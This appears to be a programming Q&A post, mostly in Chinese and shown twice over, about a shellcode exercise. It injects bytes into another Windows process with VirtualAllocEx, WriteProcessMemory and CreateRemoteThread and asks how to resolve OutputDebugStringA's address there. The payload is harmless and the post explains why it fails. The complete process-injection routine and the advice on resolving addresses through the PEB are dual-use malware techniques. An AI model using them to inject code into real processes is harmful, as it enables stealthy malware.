使用 shellcode 调用 windows API 函数
call windows API function using a shellcode
目标
我正在做一个简单的 shellcode 练习:通过 CreateRemoteThread 在远程进程中启动一段 shellcode,由它去调用 "OutputDebugStringA" — 这个练习不使用 DLL 注入!
问题
我不知道 "OutputDebugStringA" 在远程进程中的地址,只知道它在本地(注入方)进程中的地址。
到目前为止我一直在尝试什么
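int main() {
    // Bytes captured from the injecting process. They decode to
    //   48 8d 0c 25 <imm32>   lea  rcx, [abs32]        ; address of the string
    //   ff 14 25 <imm32>      call qword ptr [abs32]   ; pointer slot holding OutputDebugStringA
    // Both operands are absolute addresses that only mean something in THIS
    // process: the target has neither the string nor the pointer at those
    // addresses, and the sequence has no `ret`, so as written it cannot work
    // remotely. It is kept verbatim because this listing is about the
    // injection plumbing, not the payload.
    char ShellCode[] = "\x48\x8d\x0c\x25\x10\x9c\x8c\x4c\xff\x14\x25\x00\x01\x8d\x4c";
    // sizeof() includes the string literal's terminating NUL; don't copy it.
    const SIZE_T cbPayload = sizeof(ShellCode) - 1;

    /*
     * Open the target. Request only the rights the calls below need instead of
     * PROCESS_ALL_ACCESS (least privilege; these are the rights CreateRemoteThread,
     * VirtualAllocEx/VirtualProtectEx and WriteProcessMemory document).
     */
    const int32_t nProcID = 21440;
    const DWORD dwAccess = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                           PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    const HANDLE hProcess = OpenProcess(dwAccess, FALSE, nProcID);
    if (NULL == hProcess) {
        // The usual cause is access denied rather than "not found"; report the code
        // and stop instead of carrying a NULL handle into the calls below.
        printf("Error: the specified process couldn't be opened. Error code - %lu.\n", GetLastError());
        return 1;
    }

    /*
     * Allocate the remote buffer read/write only. It is switched to
     * execute/read after the payload is written so the target never holds a
     * page that is both writable and executable (W^X).
     */
    const LPVOID pRemote = VirtualAllocEx(hProcess, NULL, cbPayload, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (NULL == pRemote) {
        printf("Error: the memory could not be allocated inside the chosen process. Error code - %lu.\n", GetLastError());
        CloseHandle(hProcess);
        return 1;
    }

    // WriteProcessMemory returns a BOOL, not a byte count; ask for the count
    // explicitly and treat a short write as failure.
    SIZE_T cbWritten = 0;
    if (!WriteProcessMemory(hProcess, pRemote, ShellCode, cbPayload, &cbWritten) || cbWritten != cbPayload) {
        printf("Error: the payload could not be written to the process's address space. Error code - %lu.\n", GetLastError());
        VirtualFreeEx(hProcess, pRemote, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return 1;
    }

    DWORD dwOldProtect = 0;
    if (!VirtualProtectEx(hProcess, pRemote, cbPayload, PAGE_EXECUTE_READ, &dwOldProtect)) {
        printf("Error: the payload page could not be made executable. Error code - %lu.\n", GetLastError());
        VirtualFreeEx(hProcess, pRemote, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return 1;
    }

    // Start the payload. dwCreationFlags is a DWORD, so pass 0 rather than NULL.
    const HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
                                              reinterpret_cast<LPTHREAD_START_ROUTINE>(pRemote),
                                              NULL, 0, NULL);
    if (NULL == hThread) {
        printf("Error: the remote thread could not be created. Error code - %lu.\n", GetLastError());
        VirtualFreeEx(hProcess, pRemote, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return 1;
    }
    printf("Success: the remote thread was successfully created.\n");

    /*
     * The remote buffer is deliberately left mapped: the new thread executes
     * from it. Only our own handles are released; the thread handle was
     * leaked in the original listing.
     */
    CloseHandle(hThread);
    CloseHandle(hProcess);
    getchar();
    return 0;
}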
我试过的
我试过的:反汇编本地进程中对 OutputDebugStringA 的调用(见 picture1),在线把它转成 shellcode,再用这段新的 shellcode 跑上面的代码。但这段字节硬编码的是本地进程里的绝对地址——它解码为 `lea rcx,[abs32]`(取字符串地址)和 `call qword ptr [abs32]`(经一个函数指针槽位间接调用,很可能是本模块导入表里的项),而远程进程中这些地址上并没有同样的字符串和指针,所以调用失败。
如果你只是想知道 OutputDebugStringA 的地址(假设你的 shellcode 本身是有效的),它和当前进程中的地址是一样的,可以用 `LPVOID function_addr = reinterpret_cast<LPVOID>(GetProcAddress(GetModuleHandleA("kernel32.dll"), "OutputDebugStringA"));` 得到,然后按需把 function_addr 写进 shellcode。原因是 kernel32.dll 在每个进程中的基地址相同,所以相对虚拟地址相同,绝对地址也就相同。
注意这个前提有限制:Windows 的 ASLR 只在每次启动时为系统 DLL 随机化一次基址,因此"相同"仅对同一次启动会话、且位数相同(64 位对 64 位,不能是 WoW64 的 32 位进程)的进程成立;更稳妥的 shellcode 会在运行时自己解析地址(例如通过 PEB 的已加载模块表和 kernel32 的导出表),而不是嵌入一个在本地取得的常量。另外,上面那段 shellcode 里的字符串指针同样指向本地进程,远程进程中并没有这段字符串,所以 shellcode 还需要自带字符串字节;它在 call 之后也没有 `ret`,且没有按 x64 调用约定预留 32 字节影子空间并对齐栈,作为线程入口这样会在 call 返回后继续执行缓冲区末尾之后的内容。
目标 我正在做一个简单的 shellcode 练习:通过 CreateRemoteThread 在远程进程中启动一段 shellcode,由它去调用 "OutputDebugStringA" — 这个练习不使用 DLL 注入!
问题 我不知道 "OutputDebugStringA" 在远程进程中的地址,只知道它在本地(注入方)进程中的地址。
到目前为止我一直在尝试什么
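int main() {
    // Bytes captured from the injecting process. They decode to
    //   48 8d 0c 25 <imm32>   lea  rcx, [abs32]        ; address of the string
    //   ff 14 25 <imm32>      call qword ptr [abs32]   ; pointer slot holding OutputDebugStringA
    // Both operands are absolute addresses that only mean something in THIS
    // process: the target has neither the string nor the pointer at those
    // addresses, and the sequence has no `ret`, so as written it cannot work
    // remotely. It is kept verbatim because this listing is about the
    // injection plumbing, not the payload.
    char ShellCode[] = "\x48\x8d\x0c\x25\x10\x9c\x8c\x4c\xff\x14\x25\x00\x01\x8d\x4c";
    // sizeof() includes the string literal's terminating NUL; don't copy it.
    const SIZE_T cbPayload = sizeof(ShellCode) - 1;

    /*
     * Open the target. Request only the rights the calls below need instead of
     * PROCESS_ALL_ACCESS (least privilege; these are the rights CreateRemoteThread,
     * VirtualAllocEx/VirtualProtectEx and WriteProcessMemory document).
     */
    const int32_t nProcID = 21440;
    const DWORD dwAccess = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                           PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    const HANDLE hProcess = OpenProcess(dwAccess, FALSE, nProcID);
    if (NULL == hProcess) {
        // The usual cause is access denied rather than "not found"; report the code
        // and stop instead of carrying a NULL handle into the calls below.
        printf("Error: the specified process couldn't be opened. Error code - %lu.\n", GetLastError());
        return 1;
    }

    /*
     * Allocate the remote buffer read/write only. It is switched to
     * execute/read after the payload is written so the target never holds a
     * page that is both writable and executable (W^X).
     */
    const LPVOID pRemote = VirtualAllocEx(hProcess, NULL, cbPayload, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (NULL == pRemote) {
        printf("Error: the memory could not be allocated inside the chosen process. Error code - %lu.\n", GetLastError());
        CloseHandle(hProcess);
        return 1;
    }

    // WriteProcessMemory returns a BOOL, not a byte count; ask for the count
    // explicitly and treat a short write as failure.
    SIZE_T cbWritten = 0;
    if (!WriteProcessMemory(hProcess, pRemote, ShellCode, cbPayload, &cbWritten) || cbWritten != cbPayload) {
        printf("Error: the payload could not be written to the process's address space. Error code - %lu.\n", GetLastError());
        VirtualFreeEx(hProcess, pRemote, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return 1;
    }

    DWORD dwOldProtect = 0;
    if (!VirtualProtectEx(hProcess, pRemote, cbPayload, PAGE_EXECUTE_READ, &dwOldProtect)) {
        printf("Error: the payload page could not be made executable. Error code - %lu.\n", GetLastError());
        VirtualFreeEx(hProcess, pRemote, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return 1;
    }

    // Start the payload. dwCreationFlags is a DWORD, so pass 0 rather than NULL.
    const HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
                                              reinterpret_cast<LPTHREAD_START_ROUTINE>(pRemote),
                                              NULL, 0, NULL);
    if (NULL == hThread) {
        printf("Error: the remote thread could not be created. Error code - %lu.\n", GetLastError());
        VirtualFreeEx(hProcess, pRemote, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return 1;
    }
    printf("Success: the remote thread was successfully created.\n");

    /*
     * The remote buffer is deliberately left mapped: the new thread executes
     * from it. Only our own handles are released; the thread handle was
     * leaked in the original listing.
     */
    CloseHandle(hThread);
    CloseHandle(hProcess);
    getchar();
    return 0;
}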
我试过的:反汇编本地进程中对 OutputDebugStringA 的调用(见 picture1),在线把它转成 shellcode,再用这段新的 shellcode 跑上面的代码。但这段字节硬编码的是本地进程里的绝对地址——它解码为 `lea rcx,[abs32]`(取字符串地址)和 `call qword ptr [abs32]`(经一个函数指针槽位间接调用,很可能是本模块导入表里的项),而远程进程中这些地址上并没有同样的字符串和指针,所以调用失败。
如果你只是想知道 OutputDebugStringA 的地址(假设你的 shellcode 本身是有效的),它和当前进程中的地址是一样的,可以用 `LPVOID function_addr = reinterpret_cast<LPVOID>(GetProcAddress(GetModuleHandleA("kernel32.dll"), "OutputDebugStringA"));` 得到,然后按需把 function_addr 写进 shellcode。原因是 kernel32.dll 在每个进程中的基地址相同,所以相对虚拟地址相同,绝对地址也就相同。
注意这个前提有限制:Windows 的 ASLR 只在每次启动时为系统 DLL 随机化一次基址,因此"相同"仅对同一次启动会话、且位数相同(64 位对 64 位,不能是 WoW64 的 32 位进程)的进程成立;更稳妥的 shellcode 会在运行时自己解析地址(例如通过 PEB 的已加载模块表和 kernel32 的导出表),而不是嵌入一个在本地取得的常量。另外,上面那段 shellcode 里的字符串指针同样指向本地进程,远程进程中并没有这段字符串,所以 shellcode 还需要自带字符串字节;它在 call 之后也没有 `ret`,且没有按 x64 调用约定预留 32 字节影子空间并对齐栈,作为线程入口这样会在 call 返回后继续执行缓冲区末尾之后的内容。